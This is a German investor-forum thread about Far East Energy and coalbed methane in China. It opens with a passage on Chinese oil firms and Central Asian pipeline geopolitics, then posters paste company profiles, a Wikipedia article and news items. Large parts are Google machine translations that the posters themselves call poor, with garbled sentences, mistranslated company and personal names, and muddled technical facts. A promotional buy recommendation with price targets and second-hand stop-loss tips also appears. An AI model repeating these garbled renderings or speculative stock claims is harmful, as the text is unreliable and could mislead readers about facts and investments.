Um für ausländische Investoren attraktiv zu werden, haben die chinesischen Ölgesellschaften Arbeitsplätze abgebaut und beispielsweise Schulen und Krankenhäuser ausgelagert, die sie vorher für ihre Beschäftigten unterhalten hatten. Die CNPC, notiert unter dem Namen PetroChina, hat schätzungsweise 158.000 Arbeitsplätze vernichtet. Im Oktober ließ sich die "China Erdöl und Chemie Gesellschaft" als Sinopec notieren. Das erste Angebot der Aktien der dritten großen chinesischen Ölgesellschaft, China National Offshore Oil Corporation (CNOOC), ist für Anfang 2001 vorgesehen.

Die großen internationalen Ölgesellschaften bemühen sich aggressiv um einen Platz im chinesischen Energiesektor, dem mittlerweile größten außerhalb der USA. Während der letzten zwölf Monate hat es einen regelrechten Wettlauf um strategische Investitionen und Joint Ventures gegeben.

Anfang August kaufte die britische BP Amoco 2,2 Prozent von PetroChina im Austausch für ein Joint Venture, mit dem Erdöl und Gas an Chinas Küstenprovinzen verkauft werden soll, sowie Beteiligung an der Ost-West-Pipeline. BP Amoco will zusammen PetroChina in den nächsten fünf bis sieben Jahren eine Kette von mindestens 1000 Tankstellen in Südchina und eine Raffinerie und einen Terminal für Flüssiggas in Schanghai aufbauen.

Längerfristig will BP Amoco eine 2400 km lange Gaspipeline bauen, die Nordchina mit ihrem Feld in Kovitkinskoje bei Irkustsk in Russland verbindet.

Im Oktober kaufte die amerikanische ExxonMobil 19 Prozent von Sinopecs erstem öffentlichen Angebot. Nun bauen die beiden Gesellschaften unter einem gemeinsamen Firmennamen 500 Tankstellen in den Provinzen Guangdong, der Hauptexportregion Chinas. Gemeinsam mit saudischem und japanischem Kapital bauen ExxonMobil und Sinopec hochmoderne Erdölraffinerien in den Provinzen Guangdong und Fujian.

ExxonMobil ist einer der größten "Spieler" in den aufsteigenden Märkten Zentralasiens und des Fernen Ostens. Sie hat Ölanteile in Aserbaidschan und Kasachstan, sowie Gasbeteiligungen in Turkmenistan und auf der russischen Sachalin-Inseln nördlich von Japan. In Zusammenarbeit mit der CNPC prüft sie gerade die Möglichkeit von Gaspipelines von ihren Feldern im Osten Turkmenistans nach China.

Die strategischen Folgen

Chinas Pipelinenetzwerk könnte eine bedeutsame strategische Umgruppierung in der Region mit sich bringen. Zentralasien mit seinen großen Reserven an Öl, Gas und Bodenschätzen und seiner strategischen Lage ist bereits ein Gebiet erbitterter Rivalität zwischen den USA, Europa und Japan. Alle Großmächte suchen ebenso wie die transnationalen Konzerne nach Bündnissen, Beteiligungen und möglichen Pipelinerouten in den zentralasiatischen Republiken.

Das jeweilige Eigeninteresse hat China in die Gruppe der "Schanghaier-Fünf"-Nationen mit den zentralasiatischen Staaten Kasachstan, Kirgistan und Tajikistan zusammengebracht. Durch diese Gruppe versucht China, Russland wirtschaftlich und politisch an sich und Nordostasien zu binden, während Russland damit seinen traditionellen Einfluss in Zentralasien aufrecht zu erhalten versucht. Die Zeitung South China Morning Post kommentierte nach dem letzten Gipfel der Gruppe im Juli: "Wenn irgend etwas die beiden Länder einander näher bringen kann, dann ist es Russlands Export seiner großen Öl - und Gasreserven."

Es sind jedoch mehr als nur wirtschaftliche Erwägungen im Spiel. Besonders seit dem NATO-Krieg gegen Jugoslawien und der darauffolgenden Besetzung Kosovos ist ein wichtiger Bestandteil der chinesisch-russischen Beziehungen die Angst, dass separatistische Tendenzen auf ihrem eigenen Gebiet - wie in Tschetschenien oder Singkiang - von den USA zur Intervention in die Region ausgenutzt werden könnten. China wie Russland sind erbitterte Gegner der Entwicklung eines amerikanischen Raketenabwehrsystems, das ihre nukleare Abschreckung amerikanischer Aggressionen wirkungslos machen würde. Dementsprechend versuchen beide Staaten dem Einfluss der USA in Zentralasien entgegen zu wirken und bauen ihre Beziehungen mit Schlüsselländern wie dem Iran auf.

Russland hat sich jüngst einen Vertrag mit Turkmenistan über den Kauf von 30 Milliarden Kubikmeter Gas pro Jahr gesichert. Das war ein weiterer Schlag für die vom Unglück verfolgte, US-gesponserte Transkaspische Gaspipeline - eine Pipeline für turkmenisches Gas über das Kaspische Meer zur Türkei.

Bis jetzt gibt es noch kein Bündnis zwischen Russland und China. Sollte eine solche Partnerschaft jedoch zustande kommen, würde sie die Beziehungen in Zentral - und Ostasien dramatisch verändern. Sie würde den notwendigen politischen Rahmen für größere Investitionen in ein Pipelinenetz schaffen, das sich über Zentralasien und das russische Sibirien bis an Chinas Pazifikküste erstreckt. Innerhalb von zehn Jahren könnte China zu einem größeren Verteilungsknoten für Öl - und Gasexporte nach Südkorea und Japan werden, zwei der größten Energieimporteure der Welt.

Im November besuchte Chinas Premierminister Zhu Rongji Südkorea und rief dort das "Komitee für die Wiederbelebung Westchinas und Koreas" ins Leben, das südkoreanische Investitionen in das Pipelineprojekt fördern soll. Das gegenwärtige Tauwetter auf der koreanischen Halbinsel und die Öffnung der Grenze zwischen Nord - und Südkorea für den Handel hat Koreas Interesse an Energie aus Zentralasiens geweckt. Die "Korea Gas Corporation" hat sich bereits an einer Machbarkeitsstudie beteiligt, die eine mögliche Erweiterung der vorgeschlagenen Gaspipeline vom BP Amoco gehörenden Feld Kovitskoje in Russland nach Nordchina um weitere 1600 km durch Nord - nach Südkorea untersucht.

China hat kein Geheimnis daraus gemacht, dass es sich massive japanische Investitionen in seine Projekte erhofft. Der japanische Kapitalismus hat ein erhebliches wirtschaftliches und strategisches Interesse daran, sicheren kontinentalen Zugang zu Öl und Gas des Nahen Ostens als Alternative zu möglicherweise verwundbaren Seerouten zu haben.

Eine Studie über Chinas Energiepläne des amerikanischen Think Tanks Brookings Institute hat bereits vor dem Potential einer strategischen Partnerschaft zwischen Japan und China zum Nachteil der USA gewarnt. Sergei Troush schrieb dazu: "Eine mögliche Tendenz könnte eine stärkere Zusammenarbeit zwischen China, Japan und Korea in Sicherheits - und Wirtschaftsfragen sein. Die abnehmende Bedeutung der Seerouten im Indischen und Pazifischen Ozean könnte zur Überarbeitung des grundlegenden Sicherheitsabkommens zwischen den USA und Japan führen."

Die herrschende Klasse Japans, die keine eigenen Reserven an Öl hat, war in dieser Frage schon immer sehr empfindlich. Die japanische Invasion von 1931 in Chinas nordöstliche Provinz Mandschurei zielte teilweise auf die Kontrolle über die dortigen Ölvorkommen ab. Japans Angriff auf Pearl Harbour und die darauffolgende Invasion Südostasiens war eine Reaktion auf die Seeblockade der USA, mit der die Verbindungswege durch die Straße von Malakka blockiert und Japans Ölversorgung aus dem Nahen Osten und Indonesien unterbunden wurde.

Japans Abhängigkeit von Energie, die mit Öltankern durch die Seestraßen Südostasiens transportiert werden muss und deshalb durch Blockaden verwundbar ist, ist heute sogar noch größer als vor dem Zweiten Weltkrieg. Gleichzeitig sind japanische Banken und Konzerne von der Aussicht auf hohe Profite durch die Ausbeutung zentralasiatischer Rohstoffe ebenso angezogen wie die großen transnationalen Konzerne mit Sitz in den USA und Europa.

Troush zitierte die Bemerkungen von Ikuro Sugawara, einem Analysten der Nationalen Japanischen Ölgesellschaft, der schrieb: "Die neuen Spieler Asiens, darunter Länder wie Indien und China, werden einen harten Kampf um stabile Versorgung mit Öl führen und könnten dabei auf Ansichten beharren, die sich von denen der USA und Japans unterscheiden. Japan, das ein integraler Bestandteil des asiatischen Marktes und ebenso wie seine Nachbarn vom Öl des Nahen Ostens abhängig ist, wird nicht in der Lage sein, der Linie der USA so treu wie bisher zu folgen."

Das genaue Ergebnis der gegenwärtigen Manöver in Zentralasien und ihre Folgen für das strategische Gleichgewicht in Nordostasien sind noch nicht klar. Aber die internationalen Reaktionen auf Chinas Energiepläne machen die zentrale Bedeutung der Region ebenso deutlich wie das Potential für scharfe Konflikte.

Antwort auf Beitrag Nr. 22.575.160 von Kursbrecher am 13.07.06 21:16:50 Natürlich ist hier Hindergrundwissen von dem noch kein Mensch weis erwünscht, auch über Handelspartner oder Verträge:

Hier eine Schlechte Übersetzung durch den Google Translater

Pacific Asia China Energy Inc. (SCHRITT)

SCHREITEN ist die erste kanadische Firma, zum für zu erforschen und des Kohlenlagermethans (CBM) in China zu entwickeln der Betriebsmittel. Diese Eintragung in den chinesischen Markt folgt amerikanischen Korporationen wie Sparren-Texaco, Conoco-Kreuzkopf und Far East Energy Corporation . die für Kohlenlagermethan in den letzten Jahren erforschen angefangen haben. Bis jetzt haben gewesen die Produktion das Methan mit 21 Kohlenlagern, welche die Verträge (PSC) teilt unterzeichnet mit 10 Auslandsgesellschaften in China mit einer Investition ungefähr US$150 Million und umfassen ein ganzes Gebiet von 32.853 quadratischen Kilometern. Alle Verträge werden mit China vereinigten Coalbed Methane Company (CUCBM) unterzeichnet das CBM Erforschung, Entwicklung, Produktion, Transport und Verkäufe in China beaufsichtigt.

SCHRITT ist eine haltene Firma, die vor kurzem 100 Prozent von Asien Kanada Energy Corp. erwarb. Diese Tochtergesellschaft hat ein PSC mit CUCBM unterzeichnet, um für zu erforschen und CBM Betriebsmittel in der großen Kohle zu entwickeln, Provinz von Guizhou produzierend. SCHRITT kann ein 60-Prozent-Interesse erwerben, indem er bis zu US $8 Million für ein Erforschungpilotprogramm finanziert.

SCHRITT besitzt auch 100 Prozent von China Kanada Energy Corporation (CCE). CCE hat Rechte unter einem unterschiedlichen PSC mit CUCBM, ein 70-Prozent-Interesse an einer CBM Eigenschaft zu erwerben, die 305 KM2 im Huangshi gewinnenbereich in der Hubei Provinz von Süden-zentralem China enthält. Die Firma kann sein Interesse erwerben, indem sie bis zu US$4 Million an den Erforschungaufwendungen finanziert und ein Versuchsprojekt mit 5 Brunnen durchführt.

Die Firma hat an einer Vereinbarung mit Mitchell Bohrung-Fremdfirmen Pty Ltd. von Brisbane, Australien teilgenommen. Die Joint Venture stellt eine ausschliessliche Lizenz her, eigenes bohrensystem Dymaxion Mitchells in China zu benutzen. Dymaxion ist ein einzigartiges und in hohem Grade wirkungsvolle Oberfläche in-säumen bohrentechnik, die die Firma seit frühem 2000 entfaltet hat. Bis jetzt über 200 Dymaxion sind Brunnen auf CBM Projekte gebohrt worden.

SCHRITT wurde vor kurzem Erlaubnis für die Bohrung und die Prüfung von 6 Brunnen auf Teil seiner Boatian-Qingshan Eigenschaft in der Guizhou Provinz, China bewilligt. Die Bohrung wird erwartet, um innerhalb der nächsten Wochen anzufangen und wird geplant, für August 2006 durchgeführt zu werden. Daten von den Brunnen ermöglichen der Firma, das Volumen des Geschenkes des Kohlenlagermethangases auszuwerten (CBM) und zu helfen, die kommerzielle Entwicklungsfähigkeit des Extrahierens des Gases festzusetzen.

MANAGEMENT: Devinder Randhawa, MBA - Vorsitzender, CEO u. Direktor Tunaye Sai - Präsident u. Direktor Thomas E. Hogan, P. E. - Direktor David L. Marchioni, MBA, Ph. D - Vizepräsident der Erforschung u. Direktor Normannischer Mackenzie - Direktor Steven Khan, MBA, FCSI, CFA - Executivvizepräsident u. Direktor Patrick Groening, Ca - Finanzleiter

BERATUNGSSTELLE Mike Halvorson Douglas Braun, LLB SAM Zhang

Pazifische Asien China Energie: SEDAR Firmaprofil

Beitrag Nr. 6 ( 22.584.227 )

Hier mal ein gegoogelter Artikel über Grubengas:

Kohlenlagermethan Von Wikipedia die freie Enzyklopädie Sprung zu: Navigation, Suche Kohlenlagermethan oder Kohlenlagergas, bezieht sich auf Methanablagerungen in den Poren der Kohlenähte. Sie gekennzeichnet auch als :„süsses Gas“ wegen seines relativen Mangels an Wasserstofsulfid. Sie wird durch den gleichen Prozeß verursacht, durch den Betriebsmaterial in Kohle umgewandelt wird. Das Vorhandensein dieses Gases ist von seinem Auftreten unterirdisch im Kohlenbergbau weithin bekannt, in dem es eine ernste Sicherheit Gefahr darstellt. Das Kohlenlagermethan, häufig gekennzeichnet als CBM, ist disctinct von einem typischen Sandsteingasvorratsbehälter, da das Methan innerhalb der Kohle durch eine benannte Prozeßaufnahme gespeichert wird. Das Methan ist in einem Nahflüssigkeit Zustand und zeichnet das Innere der Poren innerhalb der Kohle (genannt die Matrix). Die geöffneten Brüche in der Kohle (genannt die Bügelen) können freies Gas auch enthalten oder können mit Wasser gesättigt werden.

Um das Gas zu extrahieren, wird eine Stahl-eingehüllte Bohrung in die Meter der Kohlegebohrt Naht (200 - 1500 Untertage). Da der Druck innerhalb der Kohlenaht sinkt, passend zur Bohrung zur Oberfläche oder zum Pumpen von etwas Wasser vom Kohlenlager, produzierte Gas und „Wasser“ Entweichen zur Oberfläche durch Schläuche. Dann wird das Gas zu einer Kompressorstation und in Erdgasrohrleitungen gesendet. Das „produzierte Wasser“ ist entweder reinjected in lokalisierte Anordnungen, freigegeben in Ströme, oder für Bewässerung verwendet. Das Wasser enthält gewöhnlich Natriumbikarbonat und Chlorverbindung.

Kohlenlagermethanbrunnen produzieren mit der niedrigen Gasrate und gewöhnlich pro Tag ragen an den nahen 300 tausend Kubikfüßen (ein ungefähr 0.100 m ³ /s) empor, und können große Ausgangskosten haben. Die Produktion Profile der CBM Brunnen werden gewöhnlich durch eine „negative Abnahme“ gekennzeichnet in, welchem die Gasproduktion Rate zuerst erhöht, während die Gasrate als Wasser weg gepumpt wird und Gas anfängt zu desorbieren und zu fließen. Ein trockenes CBM, das wohl ist, schaut nicht zu einem Standard gut sehr unterschiedlich, außer daß die Gasrate ist niedriger und Abnahme mit einer viel langsameren Rate.

Der Methandesorptionprozeß folgt einer Kurve (des Gasinhalts gegen Vorratsbehälterdruck) genannt eine Langmuir Isotherme. Die Isotherme kann durch einen maximalen Gasinhalt analytisch beschrieben werden (mit endlosem Druck), und an dem der Druck Hälfte diese Gas innerhalb der Kohle besteht. Diese Parameter (benannt das Langmuir Volumen und der Langmuir Druck, beziehungsweise) sind Eigenschaften der Kohle und verändern sich weit. Eine Kohle in Alabama und eine Kohle in Kolorado können radikal unterschiedliche Langmuir Parameter, trotz der anders ähnlichen Kohleeigenschaften haben.

Während Produktion von einem Kohlevorratsbehälter auftritt, werden die änderungen im Druck geglaubt, um änderungen in der Porosität und in der Permeabilität der Kohle zu verursachen. Dieses bekannt allgemein als Matrix Schrumpfung/Swelling. Da das Gas desorbiert wird, wendete der Druck durch das Gas innerhalb der Poreabnahmen an und veranlaßte sie, in der Größe zu schrumpfen und einschränkendes Gas fließen die Kohle durch. Während die Poren schrumpfen, schrumpft die gesamte Matrix außerdem, die kann den Raum schließlich erhöhen, den das Gas durch reisen kann (die Bügelen) und Gasfluß erhöhen.

[redigieren] Reserven Geschätzte Methanreserven verändern sich, gleichwohl eine Schätzung 1997 von der USgeologischen übersicht mehr als 700 Trillion Kubikfuß (20.000 Kilometer ³) Methan innerhalb der US voraussagt. Zu einem Erdgaspreis von US$6.05 pro Million B. t.u. (US$5.73/GJ), ist dieses Volumen US$4.37 Trillion wert. Mindestens ist 100 Trillion Kubikfuß (2.800 Kilometer ³) von ihm ökonomisch entwicklungsfähig zu produzieren. Britisch-Kolumbien wird geschätzt, um ungefähr 90 Trillion Kubikfuß Kohlenlagergas zu haben. Hohe Erdgaspreise und Höchstöl bilden CBM ökonomisch entwicklungsfähig, wo es möglicherweise nicht vorher gewesen sein kann.

Firmen wie EnSafe sind an der vordersten Reihe CBM des Beratens gewesen. Seite CBM EnSafes.

[redigieren] Externe Verbindungen Es gibt einige Stücke Software, die CBM Vorratsbehälter für Voraussage simulieren können oder Bestimmung Reserven:

EXODUS Vorratsbehälter-Simulator SCHNELLER CBM VorratsbehälterToolkit EKLIPSE CBM 3M Kohlenlager-Methan-Vorratsbehälter-Modell (public - domainsoftware) Britisches Columibia Ministerium von Energie, von Gruben und von Erdöl-Betriebsmittelführer zum Kohlenlagergas Zurückgeholt von „http://en. wikipedia. org/wiki/Coalbed_methane“

Beitrag Nr. 7 ( 22.603.604 )

Die News kommt bald, die Vorbereitungen laufen bereits.

Donald Juckett Director Far East Energy Corporation

Speaker Biography: Donald Juckett is the director of Far East Energy, the third largest holder of coalbed methane concessions in China, which is focused on the acquisition of and exploration for coalbed methane in China, through agreements with ConocoPhillips and China United Coalbed Methane Company. He is also the chairman of the board of the Nominating and Corporate Governance Committee. Mr. Juckett retired from the US Department of Energy in 2003, where he held positions as director of the office of natural gas and petroleum import/export activities for fossil energy, director for natural gas and petroleum technology, and acting deputy assistant secretary for natural gas and petroleum technology. Since his retirement, he has served as the special China liaison for the US--China Oil and Gas Industry Forum held annually--an event he co-founded. In December 2005, Mr. Juckett was named director of the office of geoscience and energy of the American Association of Petroleum Geologists (AAPG), in Washington, DC, AAPG is the world's largest society of petroleum geologists. He holds a BS in chemistry from the State University of New York-Oswego and a PhD in chemistry from the State University of New York-Albany.

*Legend GS = General Session PS = Paid Session/Special Track PD = Panel Discussion SP = Stage Presentation PL = Lunch Panel WS = Workshop Session EL = Exhibitor Hosted Lunch KP = Keynote Presentation

Special Notice Please do NOT depend on this preliminary show schedule as your final guide. Changes happen between now and the actual show dates, so be sure to consult the OFFICIAL SHOW PROGRAM SUPPLEMENT included in the bag you receive when you arrive at the show for a more accurate schedule. You will also want to pick up "Daily Program Updates" at the Registration Desk each morning of the show to check on changes that have occurred since the final program went to print.

Beitrag Nr. 8 ( 22.606.533 )

Hier mal ein Älterer Bericht aus 2005. Es geht Zwar nicht so richtig hervor was Shell mit Far East Energy zu tun hat, aber der Kommentar läßt auf eingiges hoffen:

Noch eine Schlechte google Übersetzung:

Freitag, den 23. Dezember 2005 China Energie-Sektor-Gelegenheiten und Herausforderungen koexistieren Shell, BP plc, und Ferner Osten Energie Co. deckt ihre Geheimnisse zum Erfolg in China auf.

China-AsiaStocks. com Reports: China Energie-Sektor-Gelegenheiten und Herausforderungen koexistieren Shell, BP plc und Ferner Osten Energie Co. deckt ihre Geheimnisse zum Erfolg in China auf. ROBERTS, Washington, 16. November 2005 - http://www. china-asiastocks. com/ (CAS), einen Investor und ein Industrienachrichten Portal für die China-Asien Sektorberichte über Chinas geheizten Energiemarkt, mit öl, Kohle und Elektrizität Sektoren auf die Oberseite der Liste ZEIGEN und beide Herausforderungen und Gelegenheiten holen den fremden Investoren. Ferner Osten Energy Corporation (OTCBB: FEEC) CFO Bruce ärger, königliche Holländer/Shell (NYSE: RDS-A) Externe Angelegenheit-Direktor Nick Wood und BP plc. (NYSE: BP) Presseoffizier David Nicholas stellen Einblicke auf dem Strom und der Zukunft des Marktes und ihre Erfahrung zum Erfolg zur Verfügung. Die Auslandsgesellschaften, die in China schließen funktionieren auch, ConocoPhillips, Chevron, ESSO mit ein, Meiya Power begrenzte Company und AES Corp. Viele Firmen wie Peabody Energie (NYSE: B. t.u.) und Petroleos De Venezuela (PDVSA) suchen aktiv nach Gelegenheiten in diesem Sektor.

China-AsiaStocks. com Reports: China Energie-Sektor - Gelegenheiten und Herausforderungen koexistieren

Fei Wang berichtet für http://www. china-asiastocks. com/, http://www. oilandgasstocknews. com/ und http://www. naturalgasstocks. com/ November 2005

“ Wir glauben, daß Shell Fähigkeiten und Stärken hat . die nützlich sind, wenn man Energiebetriebsmittel Chinas in einer stützbaren Weise entwickelt, und wir glauben, daß chinesische Firmen ihre eigenen funktionsfähigen Stärken sowie unvergleichliche Erfahrung des Funktionierens in China haben. Wir glauben dem in vielen Fällen, indem wir jene Stärken kombinieren, die, du eine Teilhaberschaft, die stärker, als ist jeder Partner verursachen kannst, der vorwärts alleine auf ein Projekt geht. „, sagte Einschnitt-Holz, Shell externe Angelegenheit-Direktor im China Markt (NYSE: RDS-A).

Bruce ärger, CFO für Fernen Osten Energy Corporation (OTCBB: FEEC), offensichtlich gesagt,“, die Expansion ist unglaublich und zeigt keine Zeichen von ließ oben während der nahen Bezeichnung Zukunft. Wir sind auf der Zukunft des Gasmarktes in China sehr bullish und sind sehr erfreut, die Entwicklung eines hoch entwickelteren Gasmarktüberschusses zu sehen die letzten Paare von Jahren. „ Um den Gesamtbericht zu lesen hier klicken: http://www. China-AsiaStocks. com/CAS/News/China_Energy_Market. aspRelease und Artikel übersetzten: http://www. China-AsiaStocks. com/CAS/News/China_Energy_MarketT. asp

Die CAS Web site bildet nicht Empfehlungen, aber Angebote ein einzigartiges Informationen Portal für Investoren, Nachrichten zu erforschen, Artikel und neue Forschung. Gekennzeichnete Firma: (CAS wird ausgeglichen, wie im Verzicht freigegeben.)

Hier mal was von Swiss Finacial Report, interresannt ist auch die Prognosse für dieses Jahr

Far East Energy kaufen

22.04.2004 Swiss Financial Report

Die Experten von "Swiss Financial Report" empfehlen die Aktie von Far East Energy (ISIN US3073251007 / WKN 551426) zu kaufen.

Nicht nur die USA würden immer wieder mit Stromausfällen kämpfen, selbst das Land mit einer der weltweit höchsten Wirtschaftswachstumsraten erlebe derzeit seine erste Energiekrise. Kaum zu glauben, aber wahr. Anfang April habe sich ein Analyst der renommierten Investmentbank Morgan Stanley im "Handelsblatt" dahingehend geäußert, dass die Rationierung von Strom in China weit verbreitet sei. Selbst prominente Exportfirmen seien gebeten worden, an zwei Tagen in der Woche keinen Strom zu verbrauchen. Und Chinas Handelsdefizit im Energiesektor wachse jährlich um unglaubliche 70 Prozent! Kein Wunder, dass die chinesische Regierung verzweifelt versuche, den immensen Energiebedarf der Wirtschaft zu sichern. Ob bei der Exploration inländischer Öl - und Gasreserven (auch im Meer) oder im angrenzenden Kasachstan - China ergreife alle sich bietenden Möglichkeiten.

Durch das starke Wirtschaftswachstum nehme der chinesische Energiebedarf enorm zu und diese Nachfragesteigerung dürfte auch zu einem relativ hohen Inlandspreisniveau bei Erdgas führen! Man erwarte, dass sich dieser dauerhaft über dem Niveau von 4,50 USD/mcf halten werde. Einige junge Öl - und Gasexplorationsunternehmen würden sehr stark von dieser prekären Situation profitieren.

Dank eines sehr erfahrenden Managementteams und einer Reihe aussichtsreicher Gasexplorationsprojekte sei Far East Energy hier hervorragend positioniert. Der Hauptfokus der aktuellen Aktivitäten liege in Yunnan, China. Die Ergebnisse der ersten beiden Bohrungen seien sowohl hinsichtlich der Gasqualität als auch bezüglich der vorhandenen Menge einfach phänomenal gewesen!

Bei dem gefundenen Gas im Enhong-Laochang-Block handle es sich um verhältnismäßig reines Methan und der gemessene Gasgehalt liege mit 700 bis 840 Kubikfuß (cf) je Tonne Kohle überproportional hoch! Und Far East Energy halte an dieser Perle 60 Prozent! Dieser Gasgehalt übersteige sogar jenen der großen Methanvorkommen in den USA. Dort seien Werte von 300 bis 700 cf/t (San Juan Basin in New Mexico) sowie 250-500 cf/t (Black Warnor Basin in Alabama) gemessen worden.

Die zweite Testbohrung habe aufgrund der geringeren Bohrtiefe 350 cf/t ergeben. Damit habe auch dieses Ergebnis am oberen Ende der Erwartungen gelegen! Und auch die dritte Probebohrung, deren Ergebnisse Anfang der Woche bekannt gegeben worden seien, habe mit 280 bis 350 cf/t ebenfalls ein exzellenten Ergebnis zu Tage gefördert. Bis zum Frühsommer 2004 sollten insgesamt fünf Bohrungen abgeschlossen werden. Als nächster Schritt seien dann acht Pilotbohrungen geplant, woraus bereits eine Testproduktion realisiert werden könnte!

Das größte Wertsteigerungspotenzial liegt aber im "Dragon Projekt" in der Shanxi-Region. Im März 2004 habe sich Far East Energy einen Anteil von mindestens 40 Prozent an einem der vermutlich weltweit größten Gasvorkommen gesichert! In Zusammenarbeit mit der China United CoalBed Methane Corporation (CUCBM) und Philips China, einer Tochter von Conoco Philips, arbeite Far East Energy an einem Projekt, dessen Gesamtumfang derzeit auf sagenhafte 13 tcf Erdgas geschätzt werde! Und das Beste: dieses Riesenvorkommen liege unmittelbar in der Nähe von zwei Erdgaspipelines!

Die Experten würden davon ausgehen, dass der Aktienkurs von Far East Energy im Falle weiterer positiver Bohrergebnisse weit über das aktuelle Niveau steigen werde. Allein die anteiligen chinesischen Gasreserven von Far East Energy würden auf mindestens 4,2 tcf geschätzt! Bezogen auf die derzeitige Marktkapitalisierung von nur 140 Mio. USD ergebe dies eine Bewertung von gerade einmal 0,04 USD/mcf!

Die Durchschnittsbewertung von Erdgasreserven liege aber bei mehr als 1 USD/mcf. Selbst unter Berücksichtigung eines hohen Sicherheitsabschlages und weiterer zur Finanzierung auszugebender Aktien sei Far East Energy extrem unterbewertet. Ein bald zu erwartendes AMEX-Listing sollte zudem weitere Aufmerksamkeit auf das Unternehmen lenken. Aufgrund der hervorragenden Aussichten empfehlen die Experten von "Swiss Financial Report" spekulativen Anlegern die Aktie von Far East Energy mit einem ersten Kursziel von 4,20 Euro auf Sicht von sechs Monaten zum Kauf. Derzeit notiere die Aktie bei 2,15 Euro. Die Aktie könne spesengünstig in Berlin erworben werden

Beitrag Nr. 22 ( 23.658.298 )

ACHTUNG nicht meine Meinung, sondern eines Börsenclubmanagers, er hatte bezüglich Feec recht mit der Einschätzung die bei 0,93 und 0,88 lag. Leider Da hilft nur noch verbilligen, wie es einige ja bereits getan haben oder abwarten.

Aufgrund der Kurslage habe ich nochmal nachgebohrt:

Marktwert: innerer 0,65

Risikoaufschlag ist etwa bei 25%

Wenn bei 0,75 keine Trendumkehr statt findet, Stoppkurse setzen.

weiter meint er noch: "Das die nächsten Monate Exploerertime sei."

Demnach, allen weiterhin viel Erfolg

Antwort auf Beitrag Nr. 23.893.962 von Turbofrank am 12.09.06 17:00:04 Euro Meinungen wie immer, unbegründet und ohne Substanz

Aber hier mal was neues aus einer Google Übersetzung

Coalbed gas pipeline construction projects in the country first launched in Shanxi

Updated Time. 2006-6-21   June 19 afternoon, the CBM in Shanxi Transportation Company Limited and Asia and the U. S. mainland CBM signed long-term supply agreements and strategic intent, which means that the development and use of CBM in Shanxi Province to take the first step also marks the first shipment of coal bed gas pipeline -- to Houma Pipeline construction project officially started. According to CBM in Shanxi Transportation Ltd. Li Baoshan, a shipment to Houma coalbed methane gas pipeline 145 km long, running through Qinshui, Yicheng, QuWo three counties, the three counties to supply; Sub-counties have lost three gas stations, pipelines arrived in Houma, direction again three hours to lose, he went to Yuncheng, went to Hejin, broke through Linfen. Next, the construction of Route son, radioactive gas pipeline to Jinnan other counties.

According to the briefing, southern Shanxi's Linfen, Yuncheng region, only allocated 100 million cubic meters of natural gas, and satisfy the needs of users in the region. "These two regions to the introduction of coal-seam gas, may fill local residents, public welfare users, car users and industrial users of natural gas in the gap, but also to improve the air pollution situation in Jinnan district. "Li Baoshan, said that he expected at the end of this year to the first half of next year, a shipment to Houma ventilation pipelines built to transport 300 million cubic meters of CBM. Since then, the volume of gas has increased to 2010, the volume will reach 5-10 billion cubic meters of gas.

CBM (commonly known as gas) main components methane, is a new type of clean energy and high-quality chemical raw materials, energy is one of the 21st century's main successor. 10 trillion cubic meters of coalbed methane resources in Shanxi, accounting for one-third of the national total.

Methane is the main component of natural gas and coalbed methane as a result, the use of Shanxi Province has built 400 km gas pipeline for multiphase. Li Baoshan, said that before the end of the year will build 300 km pipeline, 700 km ultimate control over the size of the network, so other cities and counties in the province CBM gradually benefit.

In addition, the cooperation of the two companies will jointly develop coalbed methane build up by the Yangcheng connect Henan Province, as well as the direction of long-out by linking the province of Hebei, Shandong direction of the two pipelines, which is expected to increase in 2010, to the province can supply 20 billion cubic meters annually.

Hier in Deutsch Kohlenlagergasrohrleitung-Bauvorhaben im Land stießen zuerst in Shanxi aus -------------------------------------------------------------------------------- Aktualisierte Zeit: 2006-6-21   19. Juni Nachmittag, das CBM in Shanxi Transportation Company begrenzt und in Asien und die USfestlandCBM unterzeichnete langfristige Versorgungsabkommen - und strategischeabsicht, das bedeutet, daß die Entwicklung und der Gebrauch CBM in der Shanxi Provinz, den ersten Schritt zu unternehmen auch den ersten Versand der Kohlenlager-Gasrohrleitung kennzeichnet -- zur Houma Rohrleitung begann Bauvorhaben offiziell. Entsprechend CBM Li Baoshan im Shanxi Transport-Ltd. sehnt sich ein Versand zur Houma Kohlenlager-Methangasrohrleitung 145 Kilometer und läuft durch Qinshui, Yicheng, QuWo drei Grafschaften, die drei Grafschaften, um zu liefern; Vor-Grafschaften haben drei Tankstellen, Rohrleitungen ankamen in Houma, Richtung wieder drei Stunden, um zu verlieren, er gingen zu Yuncheng, gingen zu Hejin, brachen durch Linfen verloren. Zunächst der Aufbau des Wegsohns, radioaktive Gasrohrleitung zu Jinnan andere Grafschaften. Entsprechend der Anweisung teilte Linfen Südshanxis, Yuncheng Region, nur 100 Million Kubikmeßinstrumente Erdgas zu und erfüllt die Notwendigkeiten der Benutzer in der Region. „Diese zwei Regionen zur Einleitung von Kohle-säumen Gas, können lokale Bewohner, allgemeine Wohlfahrt Benutzer, Autobenutzer und industrielle Benutzer des Erdgases im Abstand füllen, aber die Luftverschmutzungsituation im Jinnan Bezirk auch verbessern. „Li Baoshan, daß er am Ende dieses Jahres zur ersten Hälfte des folgenden Jahres, erwartete ein Versand zu den Houma Ventilation Rohrleitungen gesagt errichtet, um 300 Million Kubikmeßinstrumente CBM zu transportieren. Seit damals hat das Volumen des Gases sich bis 2010, das Volumen erreicht 5-10 Milliarde Kubikmeßinstrumente Gas erhöht. CBM (allgemein bekannt als Gas) Hauptbestandteile Methan, ist eine neue Art saubere Energie und hochwertige chemische Rohstoffe, Energie ist einer des Hauptnachfolgers des 21. Jahrhunderts. 10 Trillion Kubikmeßinstrumente Kohlenlagermethanbetriebsmittel in Shanxi, Drittel der nationalen Gesamtmenge betragend. Methan ist der Hauptbestandteil des Erdgases und Kohlenlagermethan infolgedessen, der Gebrauch der Shanxi Provinz hat 400 Kilometer Gasrohrleitung für Mehrphasen - errichtet. Li Baoshan, gesagt dem, bevor das Ende des Jahres die 300 Kilometer Rohrleitung errichtet, 700 Kilometer entscheidendes Steuer - über der Größe des Netzes, so andere Städte und Grafschaften in der Provinz CBM fördern stufenweise. Zusätzlich entwickelt die Mitarbeit der zwei Firmen gemeinsam Kohlenlagermethanaufbau durch das Yangcheng anschließt Henan Provinz, sowie die Richtung von langem-heraus, indem sie die Provinz von Hebei, Shandong Richtung der zwei Rohrleitungen, die erwartet wird, um sich 2010 zu erhöhen, zur Provinz verbindet, 20 Milliarde 